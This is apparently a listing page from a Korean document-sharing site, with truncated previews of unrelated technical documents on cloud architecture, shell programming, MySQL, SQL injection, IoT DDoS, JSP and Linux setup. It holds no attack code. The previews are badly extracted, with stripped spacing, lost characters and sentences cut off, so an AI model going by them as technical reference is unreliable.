Cloud Friendly System Architecture -Service Clients Administrator 1. -Service 구성도 : ( 좌측참고 ) LB(LoadBlancer) 2. -Service 개요 ucloud Virtual Router F/W Monitoring 개념 특징 적용가능분야 Server, WAS, DB 로구성되어 web service 를클라우드환경에서제공하기위한 service architecture

More information

Microsoft PowerPoint - 02-Shell-Programming

Microsoft PowerPoint - 02-Shell-Programming 2. 쉘프로그래밍 상명대학교소프트웨어학부 쉘 (Shell) 쉘 : 명령어해석기 단말기나파일로부터입력된명령을해석하여적절한명령을실행 시스템환경변경, 명령어입력편의를제공 쉘의종류 Bourne Shell(sh) /bin/sh Korn Shell(ksh) /bin/ksh C Shell(csh) /bin/csh Bourne Again Shell(bash) /bin/bash

More information

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아 LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml

More information

문서 템플릿

문서 템플릿 HDSI 툴분석 [sql injection 기술명세서 ] Sql injection 기술명세서 Ver. 0.01 이문서는 sql injection 기술명세가범위입니다. Copyrights Copyright 2009 by CanvasTeam@SpeeDroot( 장경칩 ) All Rights Reserved. 장경칩의사전승인없이본내용의전부또는일부에대한복사, 전재,

More information

MySQL-Ch05

MySQL-Ch05 MySQL P A R T 2 Chapter 05 Chapter 06 Chapter 07 Chapter 08 05 Chapter MySQL MySQL. (, C, Perl, PHP),. 5.1 MySQL., mysqldump, mysqlimport, mysqladmin, mysql. MySQL. mysql,. SQL. MySQL... MySQL ( ). MySQL,.

More information

제20회_해킹방지워크샵_(이재석)

제20회_해킹방지워크샵_(이재석) IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

Interstage5 SOAP서비스 설정 가이드

Interstage5 SOAP서비스 설정 가이드 Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service

More information

3장

3장 C H A P T E R 03 CHAPTER 03 03-01 03-01-01 Win m1 f1 e4 e5 e6 o8 Mac m1 f1 s1.2 o8 Linux m1 f1 k3 o8 AJAX

More information

/chroot/lib/ /chroot/etc/

/chroot/lib/ /chroot/etc/ 구축 환경 VirtualBox - Fedora 15 (kernel : 2.6.40.4-5.fc15.i686.PAE) 작동 원리 chroot유저 ssh 접속 -> 접속유저의 홈디렉토리 밑.ssh의 rc 파일 실행 -> daemonstart실행 -> daemon 작동 -> 접속 유저만의 Jail 디렉토리 생성 -> 접속 유저의.bashrc 의 chroot 명령어

More information

untitled

untitled Push... 2 Push... 4 Push... 5 Push... 13 Push... 15 1 FORCS Co., LTD A Leader of Enterprise e-business Solution Push (Daemon ), Push Push Observer. Push., Observer. Session. Thread Thread. Observer ID.

More information

SMB_ICMP_UDP(huichang).PDF

SMB_ICMP_UDP(huichang).PDF SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request

More information

WAS 의동작과 WEB, Servlet, JSP 엑셈컨설팅본부 /APM 박종현 웹어플리케이션서버란? 웹어플리케이션서버방식은웹서버가직접어플리케이션프로그램을처리하는것이아니라웹어플리케이션서버에게처리를넘겨주고어플리케이션서버가어플리케이션프로그램을처리한다. 여러명의사용자가동일한페

WAS 의동작과 WEB, Servlet, JSP 엑셈컨설팅본부 /APM 박종현 웹어플리케이션서버란? 웹어플리케이션서버방식은웹서버가직접어플리케이션프로그램을처리하는것이아니라웹어플리케이션서버에게처리를넘겨주고어플리케이션서버가어플리케이션프로그램을처리한다. 여러명의사용자가동일한페 WAS 의동작과 WEB, Servlet, JSP 엑셈컨설팅본부 /APM 박종현 웹어플리케이션서버란? 웹어플리케이션서버방식은웹서버가직접어플리케이션프로그램을처리하는것이아니라웹어플리케이션서버에게처리를넘겨주고어플리케이션서버가어플리케이션프로그램을처리한다. 여러명의사용자가동일한페이지를요청하여여러어플리케이션프로그램을처리할때오직한개의프로세스만을할당하고사용자의요청을 thread

More information

[ 컴퓨터시스템 ] 3 주차 1 차시. 디렉토리사이의이동 3 주차 1 차시디렉토리사이의이동 학습목표 1. pwd 명령을사용하여현재디렉토리를확인할수있다. 2. cd 명령을사용하여다른디렉토리로이동할수있다. 3. ls 명령을사용하여디렉토리내의파일목록을옵션에따라다양하게확인할수

[ 컴퓨터시스템 ] 3 주차 1 차시. 디렉토리사이의이동 3 주차 1 차시디렉토리사이의이동 학습목표 1. pwd 명령을사용하여현재디렉토리를확인할수있다. 2. cd 명령을사용하여다른디렉토리로이동할수있다. 3. ls 명령을사용하여디렉토리내의파일목록을옵션에따라다양하게확인할수 3 주차 1 차시디렉토리사이의이동 학습목표 1. pwd 명령을사용하여현재디렉토리를확인할수있다. 2. cd 명령을사용하여다른디렉토리로이동할수있다. 3. ls 명령을사용하여디렉토리내의파일목록을옵션에따라다양하게확인할수있다. 학습내용 1 : 현재디렉토리확인 1. 홈디렉토리 - 로그인을한후, 사용자가기본으로놓이게되는디렉토리위치를홈디렉토리 (home directory)

More information

bn2019_2

bn2019_2 arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily

More information

Microsoft PowerPoint - GUI _DB연동.ppt [호환 모드]

Microsoft PowerPoint - GUI _DB연동.ppt [호환 모드] GUI 설계 6 주차 DB 연동김문정 tops@yd.ac.kr 강의순서강의전환경 JDK 설치및환경설정톰캣설치및환경설정이클립스 (JEE) 설치및환경설정 MySQL( 드라이버 ) 설치및커넥터드라이브연결 DB 생성 - 계정생성이클립스에서 DB에연결서버생성 - 프로젝트생성 DB연결테이블생성및등록 2 MySQL 설치확인 mysql - u root -p MySQL 에데이터베이스추가

More information

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration

More information

2 PX-8000과 RM-8000/LM-8000등의 관련 제품은 시스템의 간편한 설치와 쉬운 운영에 대한 고급 기술을 제공합니다. 또한 뛰어난 확장성으로 사용자가 요구하는 시스템을 손쉽게 구현할 수 있습니다. 메인컨트롤러인 PX-8000의 BGM입력소스를 8개의 로컬지

2 PX-8000과 RM-8000/LM-8000등의 관련 제품은 시스템의 간편한 설치와 쉬운 운영에 대한 고급 기술을 제공합니다. 또한 뛰어난 확장성으로 사용자가 요구하는 시스템을 손쉽게 구현할 수 있습니다. 메인컨트롤러인 PX-8000의 BGM입력소스를 8개의 로컬지 PX-8000 SYSTEM 8 x 8 Audio Matrix with Local Control 2 PX-8000과 RM-8000/LM-8000등의 관련 제품은 시스템의 간편한 설치와 쉬운 운영에 대한 고급 기술을 제공합니다. 또한 뛰어난 확장성으로 사용자가 요구하는 시스템을 손쉽게 구현할 수 있습니다. 메인컨트롤러인 PX-8000의 BGM입력소스를 8개의 로컬지역에

More information

Sena Technologies, Inc. HelloDevice Super 1.1.0

Sena Technologies, Inc. HelloDevice Super 1.1.0 HelloDevice Super 110 Copyright 1998-2005, All rights reserved HelloDevice 210 ()137-130 Tel: (02) 573-5422 Fax: (02) 573-7710 E-Mail: support@senacom Website: http://wwwsenacom Revision history Revision

More information

Microsoft PowerPoint - aj-lecture1.ppt [호환 모드]

Microsoft PowerPoint - aj-lecture1.ppt [호환 모드] 인터넷과웹서비스 개발환경구성, JSP 기본구조 인터넷과 WWW(World Wide Web) 인터넷은 TCP/IP 기반의네트워크가전세계적으로확대되어하나로연결된 네트워크의네트워크 WWW(World Wide Web) 는인터넷기반의서비스중하나 이름프로토콜포트기능 WWW http 80 웹서비스 524730-1 2019 년봄학기 3/11/2019 박경신 Email SMTP/POP3/IMAP

More information

Microsoft PowerPoint - 07-EDU-Apache-9-1.ppt

Microsoft PowerPoint - 07-EDU-Apache-9-1.ppt 1 아파치, HTTP, APM 소개 APM 설치하기 순천향대학교컴퓨터학부이상정 1 아파치, HTTP, APM 소개 순천향대학교컴퓨터학부이상정 2 소개 정식명칭 : Apache HTTP server 관련홈페이지 : www.apache.org GNU GPL 라이센스를통해무료로배포되는소프트웨어 현재 50% 이상의웹서버소프트웨어시장점유율 안정적으로동작 www.amazon.com이나

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web server porting 1 Jo, Heeseung 웹서버포팅 HBE-SM5-S4210 를임베디드웹서버로사용할수있도록웹서버를올리는작업 임베디드서버에널리쓰이는웹서버들중 GoAhead 라는웹서버를포팅 CGI 프로그램을이용하여웹에서 HBE-SM5-S4210 의 LED, 7- Segment, TextLCD 를제어실습 2 Goahead webserver 소스를다운받거나제공된

More information

ISP and CodeVisionAVR C Compiler.hwp

ISP and CodeVisionAVR C Compiler.hwp USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler http://www.avrmall.com/ November 12, 2007 Copyright (c) 2003-2008 All Rights Reserved. USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler

More information

Chapter 05. 파일접근권한관리하기

Chapter 05. 파일접근권한관리하기 Chapter 05. 파일접근권한관리하기 00. 개요 01. 파일의속성 02. 파일의접근권한 03. 기호를이용한파일접근권한변경 04. 숫자를이용한파일접근권한변경 05. 기본접근권한설정 06. 특수접근권한 파일의속성을이해하고설명할수있다. 접근권한의종류와표기방법을이해하고설명할수있다. 접근권한을바꾸기위해기호모드에서원하는권한을기호로표기할수있다. 접근권한을바꾸기위해숫자모드에서원하는권한을숫자로표기할수있다.

More information

DBMS & SQL Server Installation Database Laboratory

DBMS & SQL Server Installation Database Laboratory DBMS & 조교 _ 최윤영 } 데이터베이스연구실 (1314 호 ) } 문의사항은 cyy@hallym.ac.kr } 과제제출은 dbcyy1@gmail.com } 수업공지사항및자료는모두홈페이지에서확인 } dblab.hallym.ac.kr } 홈페이지 ID: 학번 } 홈페이지 PW:s123 2 차례 } } 설치전점검사항 } 설치단계별설명 3 Hallym Univ.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Chapter 05. 파일접근권한관리하기 00. 개요 01. 파일의속성 02. 파일의접근권한 03. 기호를이용한파일접근권한변경 04. 숫자를이용한파일접근권한변경 05. 기본접근권한설정 06. 특수접근권한 파일의속성을이해하고설명할수있다. 접근권한의종류와표기방법을이해하고설명할수있다. 접근권한을바꾸기위해기호모드에서원하는권한을기호로표기할수있다. 접근권한을바꾸기위해숫자모드에서원하는권한을숫자로표기할수있다.

More information

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx #include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의

More information

Microsoft PowerPoint - Supplement-03-TCP Programming.ppt [호환 모드]

Microsoft PowerPoint - Supplement-03-TCP Programming.ppt [호환 모드] - Socket Programming in Java - 목차 소켓소개 자바에서의 TCP 프로그램작성방법 주요클래스와메소드 HTTP 프로토콜을이용한예제 에코프로그램 Q/A 에코프로그램 - EchoServer 에코프로그램 - EchoClient TCP Programming 1 소켓소개 IP, Port, and Socket 포트 (Port): 전송계층에서통신을수행하는응용프로그램을찾기위한주소

More information

JDBC 소개및설치 Database Laboratory

JDBC 소개및설치 Database Laboratory JDBC 소개및설치 JDBC } What is the JDBC? } JAVA Database Connectivity 의약어 } 자바프로그램안에서 SQL 을실행하기위해데이터베이스를연결해주는응용프로그램인터페이스 } 연결된데이터베이스의종류와상관없이동일한방법으로자바가데이터베이스내에서발생하는트랜잭션을제어할수있도록하는환경을제공 2 JDBC Driver Manager }

More information

FileMaker 15 ODBC 및 JDBC 설명서

FileMaker 15 ODBC 및 JDBC 설명서 FileMaker 15 ODBC JDBC 2004-2016 FileMaker, Inc.. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc.. FileMaker WebDirect FileMaker, Inc... FileMaker.

More information

<4D F736F F F696E74202D20BFEEBFB5C3BCC1A6BDC7BDC D31C7D0B1E229202D20BDA92E BC8A3C8AF20B8F0B5E55D>

<4D F736F F F696E74202D20BFEEBFB5C3BCC1A6BDC7BDC D31C7D0B1E229202D20BDA92E BC8A3C8AF20B8F0B5E55D> 쉘 (Shell) 환경 운영체제실습 목차 Ⅴ. 쉘 (shell) 환경 5.1 쉘 (shell) 이란? 5.2 쉘 (shell) 기능 5.3 쉘 (shell) 변수 5.4 기타기능 5.5 쉘 (shell) 프로그래밍 5.1 쉘 (shell) 이란? 쉘 (Shell) 사용자가입력한명령어를해석해주는명령어해석기 (Command interpreter) 사용자와운영체제

More information

Microsoft PowerPoint 통신 및 압축 명령어.ppt

Microsoft PowerPoint 통신 및 압축 명령어.ppt 컴퓨터특강 () 2006 년봄학기 문양세강원대학교컴퓨터과학과 PING 원격지컴퓨터의상태 (accessible 여부 ) 를확인 $ ping host-name // alive or dead check $ ping s host-name // packet 송수신확인 Page 2 1 TELNET (1/4) telnet 은원격지에있는상대방컴퓨터에자신의컴퓨터를접속하여,

More information

1. efolder 시스템구성 A. DB B. apache - mod-perl - PHP C. SphinxSearch ( 검색서비스 ) D. File Storage 2. efolder 설치순서 A. DB (MySQL) B. efolder Service - efolder

1. efolder 시스템구성 A. DB B. apache - mod-perl - PHP C. SphinxSearch ( 검색서비스 ) D. File Storage 2. efolder 설치순서 A. DB (MySQL) B. efolder Service - efolder Embian efolder 설치가이드 efolder 시스템구성 efolder 설치순서 Installation commands 1. efolder 시스템구성 A. DB B. apache - mod-perl - PHP C. SphinxSearch ( 검색서비스 ) D. File Storage 2. efolder 설치순서 A. DB (MySQL) B. efolder

More information

슬라이드 1

슬라이드 1 Pairwise Tool & Pairwise Test NuSRS 200511305 김성규 200511306 김성훈 200614164 김효석 200611124 유성배 200518036 곡진화 2 PICT Pairwise Tool - PICT Microsoft 의 Command-line 기반의 Free Software www.pairwise.org 에서다운로드후설치

More information

슬라이드 1

슬라이드 1 전자정부개발프레임워크 1 일차실습 LAB 개발환경 - 1 - 실습목차 LAB 1-1 프로젝트생성실습 LAB 1-2 Code Generation 실습 LAB 1-3 DBIO 실습 ( 별첨 ) LAB 1-4 공통컴포넌트생성및조립도구실습 LAB 1-5 템플릿프로젝트생성실습 - 2 - LAB 1-1 프로젝트생성실습 (1/2) Step 1-1-01. 구현도구에서 egovframe>start>new

More information

MOD360: Microsoft Virtualization 360A Panel Discussion on Microsoft’s Virtualization Strategy

MOD360: Microsoft Virtualization 360A Panel Discussion on Microsoft’s Virtualization Strategy Seung Joo Baek IT Pro Evangelist Microsoft Korea http://www.koalra.com 소프트웨어유지보수감소 공격지점감소 관리감소 적은디스크공간필요 Standard and Enterprise Server Roles TS IAS Web Server Share Point Etc Server Core Server Roles

More information

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate ALTIBASE HDB 6.1.1.5.6 Patch Notes 목차 BUG-39240 offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG-41443 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate 한뒤, hash partition

More information

8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 )

8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 ) 8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 ) - DDL(Data Definition Language) : show, create, drop

More information

<4D F736F F F696E74202D20B8AEB4AABDBA20BFC0B7F920C3B3B8AEC7CFB1E22E BC8A3C8AF20B8F0B5E55D>

<4D F736F F F696E74202D20B8AEB4AABDBA20BFC0B7F920C3B3B8AEC7CFB1E22E BC8A3C8AF20B8F0B5E55D> 리눅스 오류처리하기 2007. 11. 28 안효창 라이브러리함수의오류번호얻기 errno 변수기능오류번호를저장한다. 기본형 extern int errno; 헤더파일 라이브러리함수호출에실패했을때함수예 정수값을반환하는함수 -1 반환 open 함수 포인터를반환하는함수 NULL 반환 fopen 함수 2 유닉스 / 리눅스 라이브러리함수의오류번호얻기 19-1

More information

Mango220 Android How to compile and Transfer image to Target

Mango220 Android How to compile and Transfer image to Target Mango220 Android How to compile and Transfer image to Target http://www.mangoboard.com/ http://cafe.naver.com/embeddedcrazyboys Crazy Embedded Laboratory www.mangoboard.com cafe.naver.com/embeddedcrazyboys

More information

FileMaker ODBC 및 JDBC 가이드

FileMaker ODBC 및 JDBC 가이드 FileMaker ODBC JDBC 2004-2019 FileMaker, Inc.. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker, FileMaker Cloud, FileMaker Go FileMaker, Inc.. FileMaker WebDirect FileMaker,

More information

I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r

I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r Jakarta is a Project of the Apache

More information

Solaris Express Developer Edition

Solaris Express Developer Edition Solaris Express Developer Edition : 2008 1 Solaris TM Express Developer Edition Solaris OS. Sun / Solaris, Java, Web 2.0,,. Developer Solaris Express Developer Edition System Requirements. 768MB. SPARC

More information

Microsoft Word - 3부A windows 환경 IVF + visual studio.doc

Microsoft Word - 3부A windows 환경 IVF + visual studio.doc Visual Studio 2005 + Intel Visual Fortran 9.1 install Intel Visual Fortran 9.1 intel Visual Fortran Compiler 9.1 만설치해서 DOS 모드에서실행할수있지만, Visual Studio 2005 의 IDE 를사용하기위해서는 Visual Studio 2005 를먼저설치후 Integration

More information

Keil Flexlm 라이선스 설명서

Keil Flexlm 라이선스 설명서 Copyright 2013 EMThink. All rights reserved. Date: 13 年 8 月 14 日 목차 라이선스서버의 HOSTID 찾기...3 라이선스파일만들기...5 라이선스서버프로그램다운로드하기...5 라이선스서버프로그램설치하기...6 라이선스파일수정하기...6 라이선스서버프로그램시작하기...7 라이선스서버프로그램종료하기...9 Page

More information

Microsoft PowerPoint - 03-TCP Programming.ppt

Microsoft PowerPoint - 03-TCP Programming.ppt Chapter 3. - Socket in Java - 목차 소켓소개 자바에서의 프로그램작성방법 주요클래스와메소드 HTTP 프로토콜을이용한예제 에코프로그램 에코프로그램 - EchoServer 에코프로그램 - EchoClient Q/A 1 1 소켓소개 IP,, and Socket 포트 (): 전송계층에서통신을수행하는응용프로그램을찾기위한주소 소켓 (Socket):

More information

3ÆÄÆ®-14

3ÆÄÆ®-14 chapter 14 HTTP >>> 535 Part 3 _ 1 L i Sting using System; using System.Net; using System.Text; class DownloadDataTest public static void Main (string[] argv) WebClient wc = new WebClient(); byte[] response

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Install the PDI on CentOS 2013.04 G L O B E P O I N T 1 Ⅰ linux 구성 II Pentaho Install 2013, Globepoint Inc. All Rights Reserved. 2 I. Linux 구성 2013, Globepoint Inc. All Rights Reserved. 3 IP 설정 1. 설정파일

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web Browser Web Server ( ) MS Explorer 5.0 WEB Server MS-SQL HTML Image Multimedia IIS Application Web Server ASP ASP platform Admin Web Based ASP Platform Manager Any Platform ASP : Application Service

More information

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com Content 1. SSL Strip - SSL? - SSL MITM - SSL Strip 2. SSL Strip 공격 3. 대응방법 Copyright@2012 All Rights Reserved by SemiDntmd 2 1. SSL Strip 1-1

More information

LXR 설치 및 사용법.doc

LXR 설치 및 사용법.doc Installation of LXR (Linux Cross-Reference) for Source Code Reference Code Reference LXR : 2002512( ), : 1/1 1 3 2 LXR 3 21 LXR 3 22 LXR 221 LXR 3 222 LXR 3 3 23 LXR lxrconf 4 24 241 httpdconf 6 242 htaccess

More information